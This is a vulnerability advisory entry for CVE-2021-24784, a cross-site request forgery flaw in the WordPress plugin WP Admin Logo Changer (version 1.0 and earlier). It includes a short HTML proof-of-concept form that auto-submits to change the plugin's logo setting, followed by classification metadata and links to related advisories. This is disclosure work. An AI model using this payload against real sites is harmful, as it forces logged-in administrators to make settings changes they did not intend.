WP Admin Logo Changer <= 1.0 – Plugin's Settings Update via CSRF | CVE 2021-24784 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin update them via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=wp_admin_logo_changer_dashboard" method="post" id="csrf">
<input type="hidden" name="save_logo" value="1">
<input type="hidden" name="image_url" value="https://upload.wikimedia.org/wikipedia/commons/e/e8/DID_U_ASK_4_MOAR_KINDESS_ON_WIKIPEDIA.jpg">
</form><script>csrf.submit()</script>

Affects Plugins

wp-admin-logo-changer

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

2e9132b5-f8cd-4acc-839c-188d79277270

Timeline

Publicly Published

2021-11-15 (about 2 years ago)

Added

2021-11-15 (about 2 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2024-04-05

Title

Loan Repayment Calculator and Application Form < 2.9.5 - Cross-Site Request Forgery

Published

2023-02-09

Title

ImageMagick Engine < 1.7.6 - PHAR Deserialization via CSRF

Published

2024-04-10

Title

Amelia < 1.0.96 - Cross-Site Request Forgery

Published

2023-02-28

Title

HT Slider For Elementor < 1.4.0 - Arbitrary Plugin Activation via CSRF

Published

2023-05-16

Title

WP < 6.2.1 - Thumbnail Image Update via CSRF